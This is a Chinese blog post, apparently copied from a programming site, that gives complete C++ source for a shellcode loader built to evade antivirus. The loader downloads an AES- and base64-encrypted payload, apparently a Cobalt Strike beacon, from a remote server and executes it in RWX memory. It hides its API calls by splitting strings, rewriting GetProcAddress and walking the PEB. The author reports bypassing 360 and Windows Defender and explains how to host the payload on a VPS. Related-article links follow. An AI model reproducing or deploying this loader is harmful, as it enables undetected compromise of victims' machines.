{void* axac;int payload_len = 500000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "EkYwlGs7z8OzXAEs7rszZA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;char xyVAc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };VirtualAllocT pVAc = (VirtualAllocT)CustomGetProcAddress(LoadLibrary(L"kernel32.dll"), xyVAc);axac = pVAc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存  1//使用默认设置创建会话char xyIto[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','W',0 };InternetOpenW_T pItO = (InternetOpenW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyIto);//session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);  2session = pItO(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机char xyItC[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','W',0 };InternetConnectW_T pItC = (InternetConnectW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyItC);//conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);  3conn = pItC(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求char xyHOR[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','W',0 };HttpOpenRequestW_T pHOR = (HttpOpenRequestW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyHOR);//reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);  4reqfile = pHOR(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应char xyHSR[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };HttpSendRequestW_T pHSR = (HttpSendRequestW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyHSR);//HttpSendRequest(reqfile, NULL, 0, 0, 0);  5pHSR(reqfile, NULL, 0, 0, 0);char xyIRF[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };InternetReadFile_T pIRF = (InternetReadFile_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyIRF);//InternetReadFile(reqfile, exec, payload_len, &nread);  6pIRF(reqfile, axac, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string AESEncodedContent(reinterpret_cast<const char*>(axac), nread);std::string base64DecodedContent;//base64EncodedContent = ko::Base64::encode(base64EncodedContent);string AESDecodedContent = DecryptionAES(AESEncodedContent);base64DecodedContent = ko::Base64::decode(AESDecodedContent);//void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);void* elloc = pVAc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (elloc == nullptr) {std::cerr << "Failed to allocate memory." << std::endl;return 1;}// Copy decoded content to allocated memorymemcpy(elloc, base64DecodedContent.data(), base64DecodedContent.size());// Execute the allocated contentvoid (*shellcode)() = reinterpret_cast<void(*)()>(elloc);shellcode();// Free the allocated memoryVirtualFree(elloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

接下来我们把敏感函数规避下,还有内存方面的规避,还有虚拟机的检测

敏感函数规避
LoadLibrary(L"kernel32.dll")改成getKernel32Address
使用于x64机器下
在这里插入图片描述
在这里插入图片描述
那么接下来我们把LoadLibrary(L"wininet.dll")也换掉

HMODULE getWininetAddress()
{HMODULE hWininet = nullptr;// 获取模块句柄hWininet = GetModuleHandle(L"wininet.dll");return hWininet;
}

在这里插入图片描述
在这里插入图片描述
成功上线,这里过的是360安全卫士,我们看看360杀毒效果咋样
在这里插入图片描述
360杀毒软件和360安全卫士静态扫描加上线全过了

完整代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>
#include "need.h"extern "C" PVOID64 _cdecl GetPeb();
using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")typedef LPVOID(WINAPI* VirtualAllocT)(_In_opt_ LPVOID lpAddress,_In_     SIZE_T dwSize,_In_     DWORD flAllocationType,_In_     DWORD flProtect);typedef HINTERNET(WINAPI* InternetOpenW_T)(_In_opt_ LPCWSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCWSTR lpszProxy,_In_opt_ LPCWSTR lpszProxyBypass,_In_ DWORD dwFlags);typedef HINTERNET(WINAPI* InternetConnectW_T)(_In_ HINTERNET hInternet,_In_ LPCWSTR lpszServerName,_In_ INTERNET_PORT nServerPort,_In_opt_ LPCWSTR lpszUserName,_In_opt_ LPCWSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpOpenRequestW_T)(_In_ HINTERNET hConnect,_In_opt_ LPCWSTR lpszVerb,_In_opt_ LPCWSTR lpszObjectName,_In_opt_ LPCWSTR lpszVersion,_In_opt_ LPCWSTR lpszReferrer,_In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpSendRequestW_T)(_In_ HINTERNET hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);typedef HINTERNET(WINAPI* InternetReadFile_T)(_In_ HINTERNET hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);HMODULE getKernel32Address()
{PVOID64 Peb = GetPeb();PVOID64 LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb + 0x018);  //0x018是LDR相对于PEB偏移   存放着LDR的基地址UNICODE_STRING* FullName;HMODULE hKernel32 = NULL;LIST_ENTRY* pNode = NULL;pNode = (LIST_ENTRY*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr + 0x30));  //偏移到InInitializationOrderModuleListwhile (true){FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);//BaseDllName基于InInitialzationOrderModuList的偏移if (*(FullName->Buffer + 12) == '\0'){hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));//DllBasebreak;}pNode = pNode->Flink;}return hKernel32;
}//HMODULE getWininetAddress()
//{
//    PVOID64 Peb = GetPeb();
//    PVOID64 LDR_DATA_Addr = *(PVOID64*)((BYTE*)Peb + 0x018);  // 0x018 是 LDR 相对于 PEB 的偏移,存放着 LDR 的基地址
//    UNICODE_STRING* FullName;
//    HMODULE hWininet = nullptr;
//    LIST_ENTRY* pNode = nullptr;
//    pNode = (LIST_ENTRY*)(*(PVOID64*)((BYTE*)LDR_DATA_Addr + 0x30));  // 偏移到 InInitializationOrderModuleList
//    while (true)
//    {
//        FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);  // BaseDllName 基于 InInitializationOrderModuList 的偏移
//        if (wcsstr(FullName->Buffer, L"wininet.dll") != nullptr)
//        {
//            hWininet = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));  // DllBase
//            break;
//        }
//        pNode = pNode->Flink;
//    }
//    return hWininet;
//}HMODULE getWininetAddress()
{HMODULE hWininet = nullptr;// 获取模块句柄hWininet = GetModuleHandle(L"wininet.dll");return hWininet;
}FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {// Get the address of the module's PE headerBYTE* pImageBase = (BYTE*)hModule;IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);// Get the address of the export directoryIMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);if (strcmp(lpProcName, pName) == 0) {WORD ordinal = pAddressOfNameOrdinals[i];DWORD functionRVA = pAddressOfFunctions[ordinal];FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);return pFunction;}}return NULL;
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* axac;int payload_len = 500000;   string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);int hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   string enpath = "EkYwlGs7z8OzXAEs7rszZA==";   //对应的文件string depath = DecryptionAES(enpath);int pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;char xyVAc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };VirtualAllocT pVAc = (VirtualAllocT)CustomGetProcAddress((HMODULE)getKernel32Address(), xyVAc);axac = pVAc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//使用默认设置创建会话char xyIto[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','W',0 };InternetOpenW_T pItO = (InternetOpenW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyIto);session = pItO(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机char xyItC[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','W',0 };InternetConnectW_T pItC = (InternetConnectW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyItC);conn = pItC(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求char xyHOR[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','W',0 };HttpOpenRequestW_T pHOR = (HttpOpenRequestW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyHOR);reqfile = pHOR(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应char xyHSR[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };HttpSendRequestW_T pHSR = (HttpSendRequestW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyHSR);pHSR(reqfile, NULL, 0, 0, 0);char xyIRF[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };InternetReadFile_T pIRF = (InternetReadFile_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyIRF);pIRF(reqfile, axac, payload_len, &nread);std::string AESEncodedContent(reinterpret_cast<const char*>(axac), nread);std::string base64DecodedContent;string AESDecodedContent = DecryptionAES(AESEncodedContent);base64DecodedContent = ko::Base64::decode(AESDecodedContent);void* elloc = pVAc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (elloc == nullptr) {std::cerr << "Failed to allocate memory." << std::endl;return 1;}memcpy(elloc, base64DecodedContent.data(), base64DecodedContent.size());void (*shellcode)() = reinterpret_cast<void(*)()>(elloc);shellcode();VirtualFree(elloc, 0, MEM_RELEASE);//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

在这里插入图片描述
更新到最新病毒库
在这里插入图片描述
可以看到没问题的
Windows defender试试
在这里插入图片描述
在这里插入图片描述
总共的手法又
1.请求的url进行了aes加密
2.远端的shellcode进行了先base64加密,再进行aes加密
3.导出表隐藏做了字符串打散,和自定义函数结构体(相当于重写改名)
4.进行了library的改写,通过改写成在x64下获得kernel32.dll和wininet.dll分别对照getKernel32Address函数和getWininetAddress函数
5.进行了GetProcAddress函数的改写,对照函数CustomGetProcAddress

项目使用,先base64编译bin文件,然后aes编译生成的a.txt文件
test.txt是base64加密beacon811.bin的文件
aesencode.txt是aes加密test.txt后的文件
将aesencode.txt放到vps上
开启python3 -m http.server

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/110208.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Rust】Rust学习 第十九章高级特征

【Rust】Rust学习 第十九章高级特征

现在我们已经学习了 Rust 编程语言中最常用的部分。在第二十章开始另一个新项目之前&#xff0c;让我们聊聊一些总有一天你会遇上的部分内容。你可以将本章作为不经意间遇到未知的内容时的参考。本章将要学习的功能在一些非常特定的场景下很有用处。虽然很少会碰到它们&#xf…
阅读更多...
Redis进阶 - Lua语法

Redis进阶 - Lua语法

原文首更地址&#xff0c;阅读效果更佳&#xff01; Redis进阶 - Lua语法 | CoderMast编程桅杆https://www.codermast.com/database/redis/redis-advance-lua-language.html 初识 Lua Lua 是一种轻量小巧的脚本语言&#xff0c;用标准的 C 语言编写并以源代码形式开放&#…
阅读更多...
闲人闲谈PS之四十六——网络生产全流程

闲人闲谈PS之四十六——网络生产全流程

惯例闲话&#xff1a;下半年已开始块行情似乎又是一波大涨&#xff0c;很多朋友委托我介绍PS顾问&#xff0c;很多朋友已经上了能源系统项目&#xff0c;这就造成装备制造的PS又是极度紧缺&#xff0c;rate也还可以&#xff0c;搞的自己也有点心痒痒。这种逆势大涨&#xff0c;…
阅读更多...
Django(8)-静态资源引用CSS和图片

Django(8)-静态资源引用CSS和图片

除了服务端生成的 HTML 以外&#xff0c;网络应用通常需要一些额外的文件——比如图片&#xff0c;脚本和样式表——来帮助渲染网络页面。在 Django 中&#xff0c;我们把这些文件统称为“静态文件”。 我们使用static文件来存放静态资源&#xff0c;django会在每个 INSTALLED…
阅读更多...
ReoGrid.NET集成到winfrom

ReoGrid.NET集成到winfrom

ReoGrid一个支持excel操作的控件,支持集成到任何winfrom项目内。 先看效果图: 如何使用&#xff1a; 使用ReoGrid自带excel模版设计工具先设计一个模版,设计器如下&#xff1a; 具体例子看官方文档 代码示例如下&#xff1a; var sheet reoGridControl1.CurrentWorksheet; …
阅读更多...
从C语言到C++_34(C++11_下)可变参数+ lambda+function+bind+笔试题

从C语言到C++_34(C++11_下)可变参数+ lambda+function+bind+笔试题

目录 1. 可变参数模板 1.1 展开参数包 1.1.1 递归函数方式展开 1.1.2 逗号表达式展开 1.2 emplace相关接口 2. lambda表达式&#xff08;匿名函数&#xff09; 2.1 C11之前函数的缺陷 2.2 lambda表达式语法 2.3 函数对象与lambda表达式 3. 包装器 3.1 function包装器…
阅读更多...
华为云服务器前后端分离项目打包上传及nginx配置

华为云服务器前后端分离项目打包上传及nginx配置

目录 1、Spring Boot项目打包 2、后端上传到云服务器 3、前端打包 1&#xff09;前端请求路径修改 2&#xff09;打包上传 4、下载nginx 1&#xff09;添加源 2&#xff09;安装Nginx 3&#xff09;查看nginx安装目录和版本 4&#xff09;启动 重启nginx命令 5&#…
阅读更多...
Midjourney学习(一)prompt的基础

Midjourney学习(一)prompt的基础

prompt目录 sd和mj的比较prompt组成风格表现风格时代描述表情色彩情绪环境 sd和mj的比较 自从去年9月份开始&#xff0c;sd就变得非常或火&#xff0c;跟它一起的还有一个midjourney。 他们就像是程序界的两种模式&#xff0c;sd是开源的&#xff0c;有更多的可能性更可控。但是…
阅读更多...
嵌入式学习笔记——ARM的编程模式和7种工作模式

嵌入式学习笔记——ARM的编程模式和7种工作模式

ARM提供的指令集 ARM态-ARM指令集&#xff08;32-bit&#xff09; Thumb态-Thumb指令集&#xff08;16-bit&#xff09; Thumb2态-Thumb2指令集&#xff08;16 & 32 bit&#xff09; Thumb指令集是对ARM指令集的一个子集重新编码得到的&#xff0c;指令长度为16位。通常在…
阅读更多...
windows系统配置tcp最大连接数

windows系统配置tcp最大连接数

打开注册表 运行->regedit HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters目录下 增加一个MaxUserPort&#xff08;默认值是5000&#xff0c;端口范围是1025至5000&#xff09;MaxUserPort设置为65534&#xff08;需重启服务器&#xff09; 执行dos命令&…
阅读更多...
克服紧张情绪:程序员面试心理准备的关键

克服紧张情绪:程序员面试心理准备的关键

&#x1f337;&#x1f341; 博主猫头虎 带您 Go to New World.✨&#x1f341; &#x1f984; 博客首页——猫头虎的博客&#x1f390; &#x1f433;《面试题大全专栏》 文章图文并茂&#x1f995;生动形象&#x1f996;简单易学&#xff01;欢迎大家来踩踩~&#x1f33a; &a…
阅读更多...
AI助力智能安检,基于图像目标检测实现危险品X光智能安全检测系统

AI助力智能安检,基于图像目标检测实现危险品X光智能安全检测系统

基于AI相关的技术来对一些重复性的但是又比较重要的工作来做智能化助力是一个非常有潜力的场景&#xff0c;关于这方面的项目开发实践在我之前的文章中也有不少的实践&#xff0c;感兴趣的话可以自行移步阅读即可&#xff1a;《AI助力智能安检&#xff0c;基于目标检测模型实现…
阅读更多...
【UE5:CesiumForUnreal】——3DTiles数据属性查询和单体高亮

【UE5:CesiumForUnreal】——3DTiles数据属性查询和单体高亮

目录 0.1 效果展示 0.2 实现步骤 1 数据准备 2 属性查询 2.1 射线检测 2.2 获取FeatureID 2.3 属性查询 2.4 属性显示 3 单体高亮 3.1 构建材质参数集 3.2 材质参数设置 3.3 添加Cesium Encode Metadata插件 3.4 从纹理中取出特定FeatureId属性信息 3.5 创建…
阅读更多...
linux+QT+FFmpeg 6.0,把多个QImage组合成一个视频

linux+QT+FFmpeg 6.0,把多个QImage组合成一个视频

直接上代码吧: RecordingThread.h#ifndef RECORDINGTHREAD_H #define RECORDINGTHREAD_H #include "QTimer" #include <QObject> #include <QImage> #include <QQueue>extern "C"{//因为FFmpeg是c语言,QT里面调用的话需要extern "C…
阅读更多...
7、监测数据采集物联网应用开发步骤(5.3)

7、监测数据采集物联网应用开发步骤(5.3)

监测数据采集物联网应用开发步骤(5.2) 静态配置库数据库调用&#xff0c;新建全局变量初始化类com.zxy.main.Init_Page.py #! python3 # -*- coding: utf-8 -Created on 2017年05月10日 author: zxyong 13738196011 from com.zxy.z_debug import z_debug from com.zxy.common…
阅读更多...
新SDK平台下载开源全志V853的SDK

新SDK平台下载开源全志V853的SDK

获取SDK SDK 使用 Repo 工具管理&#xff0c;拉取 SDK 需要配置安装 Repo 工具。 Repo is a tool built on top of Git. Repo helps manage many Git repositories, does the uploads to revision control systems, and automates parts of the development workflow. Repo is…
阅读更多...
开发新能源的好处

开发新能源的好处

风能无论是总装机容量还是新增装机容量&#xff0c;全球都保持着较快的发展速度&#xff0c;风能将迎来发展高峰。风电上网电价高于火电&#xff0c;期待价格理顺促进发展。生物质能有望在农业资源丰富的热带和亚热带普及&#xff0c;主要问题是降低制造成本&#xff0c;生物乙…
阅读更多...
设计模式入门笔记

设计模式入门笔记

1 设计模式简介 在IT这个行业&#xff0c;技术日新月异&#xff0c;可能你今年刚弄懂一个编程框架&#xff0c;明年它就不流行了。 然而即使在易变的IT世界也有很多几乎不变的知识&#xff0c;他们晦涩而重要&#xff0c;默默的将程序员划分为卓越与平庸两类。比如说&#xff…
阅读更多...
战略文化派,战略形成是集体信念和愿景形成的过程

战略文化派,战略形成是集体信念和愿景形成的过程

战略文化派&#xff1a;战略形成是集体信念和愿景形成的过程 趣讲大白话&#xff1a;在乎集体认同 【趣讲信息科技271期】 **************************** 关于企业文化的故事很多 比如&#xff1a;中国海尔砸冰箱后蜕变的文化 比如&#xff1a;日本的稻盛和夫倡导的东方利他文化…
阅读更多...
基于空洞卷积DCNN与长短期时间记忆模型LSTM的dcnn-lstm的回归预测模型

基于空洞卷积DCNN与长短期时间记忆模型LSTM的dcnn-lstm的回归预测模型

周末的时候有时间鼓捣的一个小实践&#xff0c;主要就是做的多因子回归预测的任务&#xff0c;关于时序数据建模和回归预测建模我的专栏和系列博文里面已经有了非常详细的介绍了&#xff0c;这里就不再多加赘述了&#xff0c;这里主要是一个模型融合的实践&#xff0c;这里的数…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发